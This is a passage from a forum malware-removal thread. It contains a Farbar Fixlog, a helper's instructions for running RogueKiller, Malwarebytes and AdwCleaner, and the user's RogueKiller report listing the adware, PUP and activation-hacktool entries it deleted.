C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\merun.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\novol.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00000.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00001.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00002.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00003.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00004.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00005.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00006.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\setup.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\sprun.exe => moved successfully
"C:\Users\Betts\AppData\Local\Temp\svchost.exe" => not found
C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\tuna.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\Uninstall.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe => moved successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay => removed successfully
HKLM\Software\Classes\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub) => removed successfully
HKLM\Software\Classes\CLSID\{99FD978C-D287-4F50-827F-B2C658EDA8E7} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub) => removed successfully
HKLM\Software\Classes\CLSID\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) => removed successfully
HKLM\Software\Classes\CLSID\{920E6DB1-9907-4370-B3A0-BAFC03D81399} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder) => removed successfully
HKLM\Software\Classes\CLSID\{16F3DD56-1AF5-4347-846D-7C10C4192619} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark) => removed successfully
HKLM\Software\Classes\CLSID\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{99FD978C-D287-4F50-827F-B2C658EDA8E7} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{920E6DB1-9907-4370-B3A0-BAFC03D81399} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{16F3DD56-1AF5-4347-846D-7C10C4192619} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\TuneUp Shredder Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\TuneUp Disk Space Explorer Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4838CD50-7E5D-4811-9B17-C47A85539F28} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\TuneUp Shredder Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\KyShellExt => removed successfully
HKLM\Software\Classes\CLSID\{FB451ACC-65B5-456a-A84E-6F9B8B75B078} => not found
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{88D277A6-0226-4F8D-8001-20D332B2AA29}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88D277A6-0226-4F8D-8001-20D332B2AA29}" => removed successfully
C:\Windows\System32\Tasks\Update\helpars => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update\helpars" => removed successfully
"C:\Users\Betts\AppData\Roaming\System.exe" => not found
C:\ProgramData\TEMP => ":05E9FFE5" ADS removed successfully
C:\Users\Betts\Cookies => ":Z9Vd5wjyCnrKb1R3FN3u9uOY" ADS removed successfully
C:\Users\Betts\Local Settings => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS removed successfully
"C:\Users\Betts\AppData\Local" => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS not found.
"C:\Users\Betts\AppData\Local\Application Data" => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS not found.
C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9 => ":7Gt0kJJ90PbKkfYIBRyj" ADS removed successfully
HKU\.DEFAULT\Software\Classes\exefile => removed successfully
HKU\.DEFAULT\Software\Classes\.exe => removed successfully
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile => removed successfully
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe => removed successfully

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 02-11-2018 13:56:32)

C:\Windows\SysWOW64\Windows Server\wserver.exe => Is moved successfully
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe => Is moved successfully
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe => Is moved successfully

==== End of Fixlog 13:56:32 ====
 

Broni

Malware Annihilator
Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double click on downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Remove Selected.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8/10 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
 

Bruce Betts

TS Rookie
RogueKiller Anti-Malware V13.0.6.0 (x64) [Nov 1 2018] (Free) by Adlice Software
mail : https://adlice.com/contact/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Website : https://adlice.com/download/roguekiller/?utm_campaign=roguekiller&utm_source=soft&utm_medium=btn
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : Betts [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Standard Scan, Delete -- Date : 2018/11/03 21:40:28 (Duration : 00:40:48)
Switches : -refid 3

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Delete ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] IEProtectDll64.dll -- %programdata%\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\IEProtectDll64.dll -> Unloaded
[VT.Detected (Malicious)] C:\Windows\Tasks\Opera scheduled Autoupdate 4086469641.job -- C:\Users\Betts\AppData\Roaming\Microsoft\Windows\icfgratf\bafcjfdr.exe -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_CLASSES_ROOT\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458} -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\OSTotoSoft -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\OSTotoSoft -- -> Deleted
[Root.Wajam|PUP.Gen1 (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WajIEnhance -- -> Deleted
[PUP.Gen1 (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\WebApp -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|6879fe793de5f826544fc9bd3b3ae212 -- "C:\ProgramData\audio.exe" .. -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[VT.Detected (Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run|Blogger -- C:\ProgramData\Blogger\Blogger.exe -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MppSvc -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\workframe -- -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\LDrvSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\MppSvc -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NFramework -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0Dev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\NVR0FLASHDev -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\workframe -- -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{16AE05FF-46DD-44B4-B291-2077CAA0BA12} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe|Name=minithunderplatform.exe|Desc=minithunderplatform.exe|Defer=User| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{68156B91-CF34-473E-AB1A-FFE48978ABE6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe| -> Deleted
[PUP.DriverTalent (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{816EE104-0E87-450F-BD65-331DE3DBA835} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe|Name=C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{E3854BBF-9A19-452A-89A0-959BF2EF2B3F} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|LPort=1688|App=C:\Windows\KMS-R@1n.exe|Name=KMS-R@1n| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7DC9A53-3EE4-4D87-9CE6-59FB59316143} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6A562CFB-BA08-4E69-B474-AD11C8F29BE4} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{29BD916A-58BB-4DF6-B96E-F977ECDD3781} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B1EA146C-D8A9-419B-9887-8202D3B8C61B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\audio.exe|Name=audio.exe| -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OSPPSVC.EXE|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUP.HackTool (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppSvc.exe|Debugger -- KMS-R@1nHook.exe -> Deleted
[PUM.Desktop (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore|DisableSR -- 1 -> Deleted
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUM.StartMenu (Potentially Malicious)] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced|Start_ShowMyGames -- 0 -> Replaced (1)
[PUP.AutoIt.Gen (Potentially Malicious)] RNullFix64.3XE -- %SystemDrive%\32788R22FWJFW\RNullFix64.3XE -> Deleted
